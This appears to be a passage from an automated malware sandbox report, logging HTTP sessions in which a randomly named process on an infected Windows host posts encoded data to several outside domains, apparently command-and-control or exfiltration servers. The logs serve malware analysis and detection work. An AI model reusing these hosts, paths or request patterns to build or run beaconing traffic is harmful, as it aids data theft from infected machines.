                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              11192.168.2.44991238.181.21.178805592C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 9, 2024 09:11:47.983464956 CET10831OUTPOST /l9wb/ HTTP/1.1
                                                              Host: www.44ynh.top
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 10305
                                                              Origin: http://www.44ynh.top
                                                              Referer: http://www.44ynh.top/l9wb/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Raw: 58 32 35 74 49 64 54 30 3d 51 49 41 31 41 74 57 46 51 33 42 67 34 2f 2f 69 57 5a 71 56 4c 7a 56 6b 52 59 35 48 64 70 5a 78 6b 75 35 31 55 6d 53 69 46 55 6f 78 46 68 4f 63 53 75 78 31 32 52 77 59 54 4a 6a 75 6c 70 61 4d 4a 4d 4d 75 63 75 74 50 64 64 49 71 57 5a 35 54 30 49 73 43 2b 62 32 2f 6d 74 70 30 6d 34 2b 57 36 4a 64 57 34 77 33 39 57 5a 53 73 62 45 6c 51 64 62 4d 33 65 55 71 75 61 70 56 54 37 74 4b 75 72 54 76 6a 59 56 78 76 30 73 4a 31 4f 49 2f 6b 52 33 52 56 37 47 76 35 4d 63 32 6a 55 4f 42 63 73 6f 6b 78 58 67 59 4d 4d 46 46 2f 76 66 32 75 64 59 44 4c 6f 6e 33 4d 45 65 45 66 35 48 4f 6b 32 61 4a 55 6d 4e 57 6c 73 6a 67 72 75 57 77 44 37 2f 38 72 4d 55 72 55 2b 4f 71 59 79 41 76 2f 61 74 44 58 48 6e 43 79 4b 43 36 57 2b 4f 54 75 37 59 6b 6c 49 78 6e 6f 2f 6f 71 4f 6f 75 41 50 2b 59 47 6e 55 57 75 47 7a 4f 46 67 4c 71 38 32 77 6e 43 4a 73 63 44 63 75 42 48 31 76 4e 4f 74 63 6f 2f 6d 2b 68 63 45 58 33 6d 66 33 33 69 56 46 32 44 5a 31 65 4b 54 67 46 67 2b 6d 30 4e 72 34 66 79 63 70 54 37 43 6b [TRUNCATED]
                                                              Data Ascii: X25tIdT0=QIA1AtWFQ3Bg4//iWZqVLzVkRY5HdpZxku51UmSiFUoxFhOcSux12RwYTJjulpaMJMMucutPddIqWZ5T0IsC+b2/mtp0m4+W6JdW4w39WZSsbElQdbM3eUquapVT7tKurTvjYVxv0sJ1OI/kR3RV7Gv5Mc2jUOBcsokxXgYMMFF/vf2udYDLon3MEeEf5HOk2aJUmNWlsjgruWwD7/8rMUrU+OqYyAv/atDXHnCyKC6W+OTu7YklIxno/oqOouAP+YGnUWuGzOFgLq82wnCJscDcuBH1vNOtco/m+hcEX3mf33iVF2DZ1eKTgFg+m0Nr4fycpT7CkMD6G0kOqKq8LUmy00Vz1aRfUWxqknyyTsI2wMutfZq4iwX8T1v9wMl6VxcGlLoaHbjL7SO5GnEgtyrbGUBqGAmDl7S/OkjRd4tT8oJG8uyS2l6jhdNfk9aplPXJTYQOGBW7mkeYUbkPiMM978wQLcWUMed6d6jdeBEg9ItV0H1Oaoq8791MtO2fz6t0Y2ZQkXOjD6ub3CNALur0/RbJvbsn+b3bLHqPDJlmX9o+ipOo8EeT8qRXWaBwx8haI/KpUJvfg3yoMXjpwO1RvhUXMK+FLfDClHMpyEqtBXLQVOQkDKBdWK1MZsTSFGGY3/6+oJUgo44OIbkhfydYQRgAaHeUR/wSthULhz7YabsWu3jfyUt1ayw5DWaxvtK1X7as8eZauks5HEvGcizX2pwdqGrJOve+DXjQwIM3iTiDsnlFzUfoD5BYyYdX+//QBJxep1u7kNkyBXRJ8ex1X8ZE9gka6XyPdGOjA1CisVaZ9/h7vVYGZnedWM0vG9XTAN13RfYXk/J/pB/7mKgpUvHq2H9gliOuwdA0D69Rz5I5Ka23gktGbKh2XrdNcwuM/xnbTmWbXxjcRxzEXjFwVvGX3mggmppSh3liAuew4CLqiF+JhPnI4R2h5u7MVkX3WmPoUdzWN6lstVKeCnENtE7sP80pJXVnOR67E9W [TRUNCATED]
                                                              Dec 9, 2024 09:11:49.471088886 CET302INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Mon, 09 Dec 2024 08:11:49 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 138
                                                              Connection: close
                                                              ETag: "66df0ead-8a"
                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              12192.168.2.44992038.181.21.178805592C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 9, 2024 09:11:50.644700050 CET472OUTGET /l9wb/?X25tIdT0=dKoVDaTSZmwFjIfnPMekOmNSbaoqabF1rLRKWxbZMRgsIAaeZOJ62iUdSY3DsOWKNrgOWvNnZKtmZJtN7rtvj9a+jKl6nL3gw5l63A2ReISiUGJmdOx1Ym0=&_PMl3=z6VH1Hp8JH HTTP/1.1
                                                              Host: www.44ynh.top
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Dec 9, 2024 09:11:52.245742083 CET302INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Mon, 09 Dec 2024 08:11:51 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 138
                                                              Connection: close
                                                              ETag: "66df0ead-8a"
                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              13192.168.2.44995823.167.152.41805592C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 9, 2024 09:12:07.494719982 CET732OUTPOST /q34f/ HTTP/1.1
                                                              Host: www.75178.club
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 205
                                                              Origin: http://www.75178.club
                                                              Referer: http://www.75178.club/q34f/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Raw: 58 32 35 74 49 64 54 30 3d 51 57 45 56 77 47 79 2f 6c 79 59 78 71 55 75 59 6d 50 51 52 54 6a 57 62 62 45 73 59 2f 56 61 55 6d 62 72 71 78 32 49 43 47 67 30 47 56 49 4e 45 50 75 32 4e 64 5a 66 46 7a 4d 77 6f 68 46 32 6d 6a 65 2b 79 4b 4a 72 78 33 68 68 45 70 50 6a 36 5a 4b 67 39 70 55 34 6f 54 6f 64 44 30 6c 47 63 4a 73 4a 32 36 65 59 41 44 39 4e 74 58 31 6f 6e 47 48 32 62 41 2f 38 59 5a 55 6e 45 49 59 47 74 73 45 48 47 41 45 6c 47 6b 64 69 74 76 66 4b 30 52 46 42 56 64 30 70 4b 45 55 48 7a 31 34 50 76 61 5a 70 76 38 52 6c 63 6e 48 64 46 6b 35 4f 58 7a 5a 36 72 4e 55 36 70 76 30 46 6d 34 50 6b 66 6d 77 3d 3d
                                                              Data Ascii: X25tIdT0=QWEVwGy/lyYxqUuYmPQRTjWbbEsY/VaUmbrqx2ICGg0GVINEPu2NdZfFzMwohF2mje+yKJrx3hhEpPj6ZKg9pU4oTodD0lGcJsJ26eYAD9NtX1onGH2bA/8YZUnEIYGtsEHGAElGkditvfK0RFBVd0pKEUHz14PvaZpv8RlcnHdFk5OXzZ6rNU6pv0Fm4Pkfmw==


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              14192.168.2.44996723.167.152.41805592C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 9, 2024 09:12:10.155463934 CET752OUTPOST /q34f/ HTTP/1.1
                                                              Host: www.75178.club
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 225
                                                              Origin: http://www.75178.club
                                                              Referer: http://www.75178.club/q34f/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Raw: 58 32 35 74 49 64 54 30 3d 51 57 45 56 77 47 79 2f 6c 79 59 78 72 33 6d 59 67 73 34 52 61 6a 57 59 48 55 73 59 71 6c 61 51 6d 62 6e 71 78 33 64 66 42 55 59 47 56 73 4a 45 49 73 65 4e 51 35 66 46 34 73 77 68 38 56 32 54 6a 65 79 4d 4b 49 58 78 33 68 31 45 70 4f 54 36 5a 37 67 38 6f 45 34 71 47 34 64 42 72 31 47 63 4a 73 4a 32 36 59 31 6c 44 39 46 74 57 46 34 6e 4a 46 4f 45 4d 66 38 58 59 55 6e 45 44 34 47 70 73 45 48 42 41 46 4a 34 6b 66 61 74 76 66 61 30 52 52 56 61 58 30 6f 50 4f 30 47 54 32 4b 36 4c 57 37 6f 63 32 41 78 7a 75 45 6c 79 6c 2f 44 4e 69 6f 62 38 66 55 65 61 79 7a 4d 53 31 4d 5a 57 39 30 69 67 53 68 6b 79 64 49 2f 47 49 50 69 58 71 4e 42 4e 37 53 6f 3d
                                                              Data Ascii: X25tIdT0=QWEVwGy/lyYxr3mYgs4RajWYHUsYqlaQmbnqx3dfBUYGVsJEIseNQ5fF4swh8V2TjeyMKIXx3h1EpOT6Z7g8oE4qG4dBr1GcJsJ26Y1lD9FtWF4nJFOEMf8XYUnED4GpsEHBAFJ4kfatvfa0RRVaX0oPO0GT2K6LW7oc2AxzuElyl/DNiob8fUeayzMS1MZW90igShkydI/GIPiXqNBN7So=


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              15192.168.2.44997323.167.152.41805592C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 9, 2024 09:12:12.826097965 CET10834OUTPOST /q34f/ HTTP/1.1
                                                              Host: www.75178.club
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 10305
                                                              Origin: http://www.75178.club
                                                              Referer: http://www.75178.club/q34f/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Raw: 58 32 35 74 49 64 54 30 3d 51 57 45 56 77 47 79 2f 6c 79 59 78 72 33 6d 59 67 73 34 52 61 6a 57 59 48 55 73 59 71 6c 61 51 6d 62 6e 71 78 33 64 66 42 56 4d 47 56 2f 52 45 4f 4e 65 4e 52 35 66 46 78 4d 77 6b 38 56 32 4b 6a 65 37 4c 4b 49 61 4d 33 69 4e 45 70 73 62 36 49 2f 30 38 68 45 34 71 45 34 64 41 30 6c 47 7a 4a 73 5a 79 36 59 46 6c 44 39 46 74 57 41 30 6e 4f 58 32 45 4f 66 38 59 5a 55 6e 49 49 59 47 4e 73 45 76 4f 41 46 39 6f 6b 76 36 74 71 4c 47 30 54 6b 42 61 62 30 6f 42 4a 30 47 78 32 4b 6d 55 57 36 46 6e 32 41 46 5a 75 44 46 79 6e 2b 6e 56 33 34 54 2f 4e 6b 4b 4c 75 7a 64 31 34 4e 78 58 79 6d 2b 68 63 44 59 4d 42 4c 7a 57 4c 50 75 65 36 39 68 7a 6f 33 7a 76 2b 74 6d 50 62 4f 46 4e 7a 50 4e 41 4e 57 33 2b 68 4a 30 63 32 63 61 6f 55 50 6a 53 2f 38 78 31 52 4f 63 78 61 6f 4e 68 4a 38 62 4b 6c 7a 78 69 45 48 43 57 31 70 46 4c 45 66 44 4f 4b 65 61 30 6a 52 5a 51 61 78 36 4a 4a 74 69 47 45 44 59 52 59 61 68 39 51 71 4c 41 56 30 30 53 47 53 74 78 67 41 62 7a 64 2b 6f 36 2b 42 71 46 4f 72 30 2b 6c [TRUNCATED]
                                                              Data Ascii: X25tIdT0=QWEVwGy/lyYxr3mYgs4RajWYHUsYqlaQmbnqx3dfBVMGV/REONeNR5fFxMwk8V2Kje7LKIaM3iNEpsb6I/08hE4qE4dA0lGzJsZy6YFlD9FtWA0nOX2EOf8YZUnIIYGNsEvOAF9okv6tqLG0TkBab0oBJ0Gx2KmUW6Fn2AFZuDFyn+nV34T/NkKLuzd14NxXym+hcDYMBLzWLPue69hzo3zv+tmPbOFNzPNANW3+hJ0c2caoUPjS/8x1ROcxaoNhJ8bKlzxiEHCW1pFLEfDOKea0jRZQax6JJtiGEDYRYah9QqLAV00SGStxgAbzd+o6+BqFOr0+lURQO85+1UdmSbEDrD7ZFAggxD7riH8Gb+uHWyrsi3WfpXxQkoTDel/RpteSaX3SL5O6n1ySSPP+dXxfxTyDmZ2RUH4BXuLrnzg7VO1TC7ReqO2pu11HvKegxP+MuRdAL1xDOhgUGObEVJPCDdyk+yp5j+tBH5kFwgbywhIho/4T8znuDcoPhUyUeswtcI1zyNXSLRUv806XAKp99QoT2mZetL+WiMhY/k+C5n3KzXaxeKM69db6dFZr0wXLfaXtVUJj/qMlB1rqlAgQ4T3epTj2pl7LyOtdCZaIve+85moqFMjjOdliVz/6I+uEpb0XVil250C36NHW12PJtIJYlycxx1iEmKlNFrU0uGYACMBpdcThH2L2mSm87Mg7n8k0Ar7Y1/uZJ5yqz5HxQ3aqN64euj5zfdhmHWyogzHw1+Ku4rFSaqfN+1dJzvZyN+lMrMZdgDFltP4vtq5IM+YW4IpeGbPluUIQXBEEGfvpYHD+Yi2nfeRM45FdYEI3jF3URN1o4Cg6mjfyYthuEdZdeempyQ7ixYKKX9IopRF7k0LLTvb7WRaeQW6CdewlHd0PBpCYCqvCdbueneLsdZpVPVATcy3xei0OtA5AzgBaLGQQYwAqFNwdbCjcILawSjg3MNxVZgb2i8c48b+JmG+I8rQACCTyfudIbUb [TRUNCATED]


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              16192.168.2.44997923.167.152.4180
                                                              TimestampBytes transferredDirectionData
                                                              Dec 9, 2024 09:12:15.487700939 CET473OUTGET /q34f/?X25tIdT0=dUs1zx3MtgRbplDX2ZUJYQ2PdhhIhHuhj9/PkAdaJlwoIMpaDvWmQ8f5x9wKpmWIn5GTBIDw1kY0kdraeZ9e5WN4Bfp+jFvkFPdElOhqE98bTiQ+FUKDG58=&_PMl3=z6VH1Hp8JH HTTP/1.1
                                                              Host: www.75178.club
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              17192.168.2.449997103.75.185.22805592C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 9, 2024 09:12:22.587277889 CET759OUTPOST /syud/ HTTP/1.1
                                                              Host: www.taxitayninh365.site
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 205
                                                              Origin: http://www.taxitayninh365.site
                                                              Referer: http://www.taxitayninh365.site/syud/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Raw: 58 32 35 74 49 64 54 30 3d 74 79 4d 49 37 75 67 41 76 4c 70 4d 48 4e 51 36 59 78 4f 30 6e 46 67 36 6a 38 79 2b 63 69 6f 73 35 61 71 54 4f 2f 6c 5a 46 57 43 52 34 78 6a 30 55 77 35 51 73 4d 4a 4d 76 45 34 35 70 44 31 58 59 79 7a 79 30 64 5a 73 52 43 4f 76 5a 57 6a 61 4f 6b 46 32 4a 58 66 71 76 41 47 32 48 77 4b 75 6b 69 52 47 50 56 6b 4a 59 5a 41 58 66 51 52 4a 66 46 70 31 38 4b 45 7a 44 48 6e 46 52 42 54 63 5a 42 48 6b 65 56 32 2b 71 39 70 79 51 6b 45 47 37 35 67 52 78 61 72 38 64 79 6e 39 7a 77 61 4a 56 45 6c 52 66 2b 54 69 62 7a 68 7a 5a 63 2b 48 73 53 63 68 71 52 77 6e 76 4e 44 41 41 6c 79 4b 31 41 3d 3d
                                                              Data Ascii: X25tIdT0=tyMI7ugAvLpMHNQ6YxO0nFg6j8y+cios5aqTO/lZFWCR4xj0Uw5QsMJMvE45pD1XYyzy0dZsRCOvZWjaOkF2JXfqvAG2HwKukiRGPVkJYZAXfQRJfFp18KEzDHnFRBTcZBHkeV2+q9pyQkEG75gRxar8dyn9zwaJVElRf+TibzhzZc+HsSchqRwnvNDAAlyK1A==
                                                              Dec 9, 2024 09:12:24.143306017 CET1236INHTTP/1.1 404 Not Found
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 1238
                                                              date: Mon, 09 Dec 2024 08:12:23 GMT
                                                              server: LiteSpeed
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                              Dec 9, 2024 09:12:24.143388033 CET240INData Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62
                                                              Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              18192.168.2.450006103.75.185.22805592C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 9, 2024 09:12:25.243978977 CET779OUTPOST /syud/ HTTP/1.1
                                                              Host: www.taxitayninh365.site
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 225
                                                              Origin: http://www.taxitayninh365.site
                                                              Referer: http://www.taxitayninh365.site/syud/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Raw: 58 32 35 74 49 64 54 30 3d 74 79 4d 49 37 75 67 41 76 4c 70 4d 64 73 67 36 65 53 57 30 68 6c 67 39 39 4d 79 2b 56 43 6f 33 35 61 75 54 4f 37 39 4a 47 6b 57 52 37 51 54 30 54 78 35 51 72 4d 4a 4d 33 55 34 38 6e 6a 30 5a 59 79 75 59 30 63 31 73 52 47 6d 76 5a 55 72 61 4f 33 74 33 4b 6e 66 73 36 51 47 4f 61 67 4b 75 6b 69 52 47 50 57 59 6a 59 64 73 58 66 43 46 4a 51 45 70 32 30 71 45 77 4b 6e 6e 46 56 42 54 59 5a 42 48 53 65 51 57 59 71 2f 68 79 51 68 67 47 37 73 41 65 34 61 72 32 51 53 6d 50 2b 56 6e 73 62 30 30 2b 57 4f 2f 78 45 48 6c 6a 56 36 7a 64 39 6a 39 32 34 52 55 55 79 4b 4b 30 4e 6d 50 44 75 47 4e 65 37 36 2f 71 5a 75 63 35 33 7a 62 52 32 4d 2b 78 46 36 45 3d
                                                              Data Ascii: X25tIdT0=tyMI7ugAvLpMdsg6eSW0hlg99My+VCo35auTO79JGkWR7QT0Tx5QrMJM3U48nj0ZYyuY0c1sRGmvZUraO3t3Knfs6QGOagKukiRGPWYjYdsXfCFJQEp20qEwKnnFVBTYZBHSeQWYq/hyQhgG7sAe4ar2QSmP+Vnsb00+WO/xEHljV6zd9j924RUUyKK0NmPDuGNe76/qZuc53zbR2M+xF6E=
                                                              Dec 9, 2024 09:12:26.804797888 CET1236INHTTP/1.1 404 Not Found
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              content-type: text/html
                                                              content-length: 1238
                                                              date: Mon, 09 Dec 2024 08:12:26 GMT
                                                              server: LiteSpeed
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
